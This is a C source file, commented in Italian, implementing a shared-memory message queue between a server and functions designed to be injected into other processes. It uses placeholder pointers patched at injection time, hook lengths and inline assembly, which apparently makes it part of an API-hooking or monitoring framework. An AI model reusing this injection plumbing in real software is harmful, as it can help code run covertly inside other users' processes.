#include "exceptions.h"

// La memoria per la lettura e' composta da una serie di strutture che il server scrive e tutti i client
// possono leggere. La memoria per la scrittura implementa una coda di messaggi in cui i client scrivono
// e da cui il server legge.
// I client scrivono message_struct e leggono BYTE che poi loro casteranno.

// Valori base (modificabili a seconda delle esigenze)
#define MAX_MSG_LEN 0x400 // Lunghezza di un messaggio
#define MAX_MSG_NUM 650 // Massimo numero di messaggi in coda
#define SHARE_MEMORY_READ_SIZE (WRAPPER_COUNT*WRAPPER_MAX_SHARED_MEM) // Dimensione spazio per la lettura delle configurazioni da parte dei wrapper                                
#define SHARE_MEMORY_READ_NAME "KB037H1"
#define SHARE_MEMORY_WRITE_NAME "KB037H2"

// Valori derivati
#define SHARE_MEMORY_WRITE_SIZE ((MAX_MSG_NUM * sizeof(message_struct))+2)


// Macro di supporto
#define DATA_SUPPORT DWORD dwFuncLen; DWORD dwFuncAdd; DWORD dwDataAdd;
typedef struct { DATA_SUPPORT; } Generic_data_support;
#define INIT_SFUNC(STRTYPE)			STRTYPE *pData; \
									__asm    MOV EBX,69696969h \
									__asm	 MOV DWORD PTR SS:[pData], EBX \

#define MMCPY(DST, SRC, SIZ)		{ BYTE *lsrc = (BYTE *)SRC; \
									  BYTE *ldst = (BYTE *)DST; \
									  DWORD lsiz = (DWORD)SIZ; \
									__asm MOV ESI, lsrc \
									__asm MOV EDI, ldst \
									__asm MOV ECX, lsiz \
									__asm REP MOVSB }


// Struttura di un messaggio scritto dai client
// Il corpo del messaggio DEVE essere sempre l'ultimo elemento (vedi IPCServerRead)
// XXX Se modifico va cabiato anche in AM_Core
typedef struct {
	BYTE status; 
#define STATUS_FREE 0 // Libero
#define STATUS_BUSY 1 // In scrittura
#define STATUS_WRIT 2 // Scritto
	FILETIME time_stamp;
	DWORD wrapper_tag;
	DWORD message_len;
	DWORD flags;
	BYTE message[MAX_MSG_LEN];
} message_struct;


//-------------------- FUNZIONI DA INIETTARE (Client) ----------------------
//////////////////////////
//						//
//    IPCClientRead     //
//						//
//////////////////////////
typedef struct {
	COMMONDATA;
	BYTE *mem_addr;
} IPCClientRead_data_struct;

IPCClientRead_data_struct IPCClientRead_data;


// Ritorna l'indirizzo di memoria della configurazione di un dato wrapper
// Torna NULL se fallisce
static BYTE * __stdcall IPCClientRead(DWORD wrapper_tag)
{
	INIT_SFUNC(IPCClientRead_data_struct);
	if (!pData->mem_addr) 
		return NULL;
	
	return (pData->mem_addr + wrapper_tag);
}

static DWORD IPCClientRead_setup(DWORD dummy)
{
	HANDLE h_file = OpenFileMapping(FILE_MAP_READ, FALSE, SHARE_MEMORY_READ_NAME);
	IPCClientRead_data.mem_addr = 0;

	// Se non riesce ad aprire l'oggetto setta mem_addr a NULL e la funzione ritornera' sempre NULL
	// Chi la richiama dovra' controllare che il valore di ritorno sia diverso da NULL prima di leggere
	// dalla memoria
	if (h_file)
		IPCClientRead_data.mem_addr = (BYTE *)MapViewOfFile(h_file, FILE_MAP_READ, 0, 0, SHARE_MEMORY_READ_SIZE);
	
	IPCClientRead_data.dwHookLen = 150; 
	return 0;
}



//////////////////////////
//						//
//    IPCClientWrite    //
//						//
//////////////////////////
typedef void (WINAPI *GetSystemTimeAsFileTime_t) (LPFILETIME);
typedef struct {
	COMMONDATA;
	message_struct *mem_addr;
	GetSystemTimeAsFileTime_t pGetSystemTimeAsFileTime;
} IPCClientWrite_data_struct;

IPCClientWrite_data_struct IPCClientWrite_data;

// Torna TRUE se ha scritto, FALSE se fallisce
static BOOL __stdcall IPCClientWrite(DWORD wrapper_tag, BYTE *message, DWORD msg_len, DWORD flags)
{
	unsigned int i;
	message_struct *pMessage;
	FILETIME time_stamp;
	INIT_SFUNC(IPCClientWrite_data_struct);
	// Fallisce se la memoria non e' presente o se il messaggio e' troppo grosso
	// per essere scritto
	if (!pData->mem_addr || msg_len > MAX_MSG_LEN || !message) 
		return FALSE;
	
	for (i=0, pMessage=pData->mem_addr; i<MAX_MSG_NUM; i++, pMessage++) 
		if (pMessage->status == STATUS_FREE) {
			// XXX Possibilita' di remota race condition sulla lettura dello status
			pMessage->status = STATUS_BUSY;
			pMessage->message_len = msg_len;
			pMessage->wrapper_tag = wrapper_tag;
			pMessage->flags = flags;

			// Setta il time stamp
			if (pData->pGetSystemTimeAsFileTime) {
				pData->pGetSystemTimeAsFileTime(&time_stamp);
				pMessage->time_stamp.dwHighDateTime = time_stamp.dwHighDateTime;
				pMessage->time_stamp.dwLowDateTime = time_stamp.dwLowDateTime;
			} else {
				pMessage->time_stamp.dwHighDateTime = 0;
				pMessage->time_stamp.dwLowDateTime = 0;
			}

			TRY_BLOCK
				MMCPY(pMessage->message, message, msg_len);
			TRY_EXCEPT
				pMessage->status = STATUS_FREE;
			TRY_END

			if (pMessage->status == STATUS_BUSY)
				pMessage->status = STATUS_WRIT;
			return TRUE;
		}
	
	// Non ci sono spazi liberi nella coda
	return FALSE;
}

static DWORD IPCClientWrite_setup(DWORD dummy)
{
	HMODULE h_krn;
	HANDLE h_file;

	h_krn = GetModuleHandle("kernel32.dll");
	IPCClientWrite_data.pGetSystemTimeAsFileTime = (GetSystemTimeAsFileTime_t)HM_SafeGetProcAddress(h_krn, "GetSystemTimeAsFileTime");

	h_file = OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, SHARE_MEMORY_WRITE_NAME);
	IPCClientWrite_data.mem_addr = 0;

	// Se non riesce ad aprire l'oggetto setta mem_addr a NULL e la funzione ritornera' sempre NULL
	// Chi la richiama dovra' controllare che il valore di ritorno sia diverso da NULL prima di leggere
	// dalla memoria
	if (h_file)
		IPCClientWrite_data.mem_addr = (message_struct *)MapViewOfFile(h_file, FILE_MAP_ALL_ACCESS, 0, 0, SHARE_MEMORY_WRITE_SIZE);
	
	IPCClientWrite_data.dwHookLen = 360;
	return 0;
}


//-------------------- FUNZIONI per il Server ----------------------
message_struct *server_mem_addr_read = NULL;
BYTE *server_mem_addr_write = NULL;

void IPCServerWrite(DWORD wrapper_tag, BYTE *buff, DWORD size)
{
	if (server_mem_addr_write)
		memcpy(server_mem_addr_write + wrapper_tag, buff, size);
}


// Torna TRUE se ha letto qualcosa. Non e' bloccante
// XXX Non piu' usata e non aggiornata con garanzia di ordinamento
/*BOOL IPCServerRead(message_struct *serv_buff) 
{
	unsigned int i;
	message_struct *pMessage;

	if (!server_mem_addr_read)
		return FALSE;
	
	for (i=0, pMessage=server_mem_addr_read; i<MAX_MSG_NUM; i++, pMessage++) 
		if (pMessage->status == STATUS_WRIT) {
			// Assumendo che il coprpo del messaggio sia alla fine, copia soltanto il pezzo di messaggio
			// valorizzato (header del messaggio + msg_len)
			// Il check che msg_len sia minore di MAX_MSG_LEN viene fatto dalla funzione
			memcpy(serv_buff, pMessage, sizeof(message_struct) - MAX_MSG_LEN + pMessage->message_len);
			pMessage->status = STATUS_FREE;
			return TRUE;
		}
	
	// Non ci sono elementi da leggere
	return FALSE;

}*/


// Ritorna TRUE se tm1 e' piu' vecchio di tm2
BOOL is_older(FILETIME *tm1, FILETIME *tm2)
{
	if (tm1->dwHighDateTime < tm2->dwHighDateTime)
		return TRUE;
	if (tm1->dwHighDateTime > tm2->dwHighDateTime)
		return FALSE;
	if (tm1->dwLowDateTime < tm2->dwLowDateTime)
		return TRUE;
	return FALSE;
}

// Piu' veloce della Read, ritorna direttamente il messaggio nella shared memory (non fa la memcpy)
// Ma necessita che poi il messaggio sia rimosso a mano dopo che e' stato completato il dispatch
// Garantiesce l'ordinamento
message_struct *IPCServerPeek() 
{
	unsigned int i;
	message_struct *pMessage, *oldest_msg = NULL;
	FILETIME oldest_time;

	if (!server_mem_addr_read)
		return NULL;

	// Setta il tempo del piu' vecchio al massimo possibile
	// cosi' il primo verra' preso
	oldest_time.dwHighDateTime = 0xFFFFFFFF;
	oldest_time.dwLowDateTime = 0xFFFFFFFF;
	for (i=0, pMessage=server_mem_addr_read; i<MAX_MSG_NUM; i++, pMessage++)  {
		if (pMessage->status == STATUS_WRIT && is_older(&(pMessage->time_stamp), &oldest_time)) {
			oldest_msg = pMessage;
			oldest_time.dwHighDateTime = pMessage->time_stamp.dwHighDateTime;
			oldest_time.dwLowDateTime = pMessage->time_stamp.dwLowDateTime;
		}
	}

	// Ritrorna il messaggio piu' vecchio 
	// (NULL se non ce ne sono)
	return oldest_msg;
}


// Rimuove dalla coda un messaggio preso con IPCServerPeek
void IPCServerRemove(message_struct *msg) 
{
	msg->status = STATUS_FREE;
}

void IPCServerInit() 
{
	HANDLE h_file;

	// WRITE e READ sono invertiti perche' vengono visti dall'ottica del client
	h_file = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, SHARE_MEMORY_READ_SIZE, SHARE_MEMORY_READ_NAME);
	if (h_file)
		server_mem_addr_write = (BYTE *)MapViewOfFile(h_file, FILE_MAP_ALL_ACCESS, 0, 0, SHARE_MEMORY_READ_SIZE);

	h_file = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, SHARE_MEMORY_WRITE_SIZE, SHARE_MEMORY_WRITE_NAME);
	if (h_file)
		server_mem_addr_read = (message_struct *)MapViewOfFile(h_file, FILE_MAP_ALL_ACCESS, 0, 0, SHARE_MEMORY_WRITE_SIZE);

	if (server_mem_addr_read)
		memset(server_mem_addr_read, 0, SHARE_MEMORY_WRITE_SIZE);

	if (server_mem_addr_write)
		memset(server_mem_addr_write, 0, SHARE_MEMORY_READ_SIZE);
}


